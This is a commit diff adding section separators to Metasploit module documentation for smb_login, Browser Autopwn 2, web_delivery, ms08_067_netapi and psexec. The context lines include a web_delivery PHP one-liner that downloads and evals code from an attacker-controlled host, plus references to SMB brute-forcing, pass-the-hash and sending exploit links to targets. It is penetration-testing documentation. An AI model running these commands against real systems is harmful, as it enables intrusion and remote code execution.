Add --- to make sections to stand out more
parent
b82b1b0a47
commit
03eb568af7
|
@ -4,10 +4,14 @@ But feel free to add more content/sections to this.
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
---
|
||||
|
||||
Instructions to get the vulnerable application.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
Example steps in this format:
|
||||
|
||||
1. Install the application
|
||||
|
@ -18,13 +22,17 @@ But feel free to add more content/sections to this.
|
|||
|
||||
## Options
|
||||
|
||||
---
|
||||
|
||||
**Option name**
|
||||
|
||||
Talk about what it does, and how to use it appropriately.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Specific demo of using the module:
|
||||
---
|
||||
|
||||
Specific demo of using the module that might be useful in a real world scenario.
|
||||
|
||||
```
|
||||
code or console output
|
||||
|
|
|
@ -4,10 +4,14 @@ and log into more machines.
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
---
|
||||
|
||||
To use smb_login, make sure you are able to connect to a SMB service that supports SMBv1.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB:
|
||||
|
||||
```
|
||||
|
@ -42,6 +46,8 @@ msf auxiliary(smb_login)
|
|||
|
||||
## Options
|
||||
|
||||
---
|
||||
|
||||
By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will
|
||||
also need to supply user names and passwords. The following options are available to support
|
||||
different credential formats:
|
||||
|
|
|
@ -3,6 +3,8 @@ feel different for you. Here are the features you should know about before using
|
|||
|
||||
## Vulnerable Applications
|
||||
|
||||
---
|
||||
|
||||
Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:
|
||||
|
||||
* Internet Explorer
|
||||
|
@ -14,6 +16,8 @@ Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins
|
|||
|
||||
## Exploit URLs
|
||||
|
||||
---
|
||||
|
||||
Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL
|
||||
you should send to the targets you wish to attack.
|
||||
|
||||
|
@ -29,6 +33,8 @@ used, including the URLs.
|
|||
|
||||
## Browser Autopwn 2 Options
|
||||
|
||||
---
|
||||
|
||||
**The HTMLContent Option**
|
||||
|
||||
The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a
|
||||
|
@ -137,6 +143,8 @@ set ExploitReloadTimeout 5000
|
|||
|
||||
## Scenarios
|
||||
|
||||
---
|
||||
|
||||
By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use
|
||||
different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to
|
||||
test a specific application, basically all you need to do is setting the
|
||||
|
@ -158,6 +166,8 @@ $ ./msfconsole -q -r scripts/resource/bap_flash_only.rc
|
|||
|
||||
## Logging
|
||||
|
||||
---
|
||||
|
||||
In addition, when a browser connects to BAP, this link-clicking event is also logged to the
|
||||
database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also
|
||||
save the exploit list information so that after testing you can go back to the database and see
|
||||
|
|
|
@ -11,6 +11,8 @@ say the target supports Powershell.
|
|||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
To be able to use web_delivery, you must gain access to the target machine first, with the ability
|
||||
to execute either the Python, or PHP, or Powershell interpreter.
|
||||
|
||||
|
@ -44,6 +46,8 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/
|
|||
|
||||
## Targets
|
||||
|
||||
---
|
||||
|
||||
**Python**
|
||||
|
||||
Python is a fairly popular language, especially on unix-based systems. For example, it comes with
|
||||
|
@ -61,6 +65,8 @@ don't come with it by default, but it is still possible to see it installed on a
|
|||
|
||||
## Scenarios
|
||||
|
||||
---
|
||||
|
||||
**Against a compromised web application**
|
||||
|
||||
web_delivery would work nicely for a web application with a command execution vulnerability.
|
||||
|
|
|
@ -9,6 +9,8 @@ vulnerable code path, not just passively.
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
---
|
||||
|
||||
This exploit works against a vulnerable SMB service from one of these Windows systems:
|
||||
|
||||
* Windows 2000
|
||||
|
@ -20,14 +22,20 @@ the system's patch level, or use a vulnerability check.
|
|||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
Please see Basic Usage under Overview.
|
||||
|
||||
## Options
|
||||
|
||||
---
|
||||
|
||||
Please see Required Options under Overview.
|
||||
|
||||
## Scenarios
|
||||
|
||||
---
|
||||
|
||||
**Failure to detect the language pack**
|
||||
|
||||
On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this
|
||||
|
|
|
@ -9,6 +9,8 @@ you normally would with any Metasploit exploits.
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
---
|
||||
|
||||
To be able to use exploit/windows/smb/psexec, you must meet these requirements:
|
||||
|
||||
1. You have a valid username/password.
|
||||
|
@ -18,6 +20,8 @@ To be able to use exploit/windows/smb/psexec, you must meet these requirements:
|
|||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
At the minimum, you should be able use psexec to get a session with a valid credential:
|
||||
|
||||
```
|
||||
|
@ -46,6 +50,8 @@ meterpreter >
|
|||
|
||||
## Options
|
||||
|
||||
---
|
||||
|
||||
By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to
|
||||
go. But in reality, you will probably need to at least configure:
|
||||
|
||||
|
@ -59,6 +65,8 @@ This can be either the plain text version, or the Windows hash.
|
|||
|
||||
## Scenarios
|
||||
|
||||
---
|
||||
|
||||
|
||||
**Pass the Hash**
|
||||
|
||||
|
|
Loading…
Reference in New Issue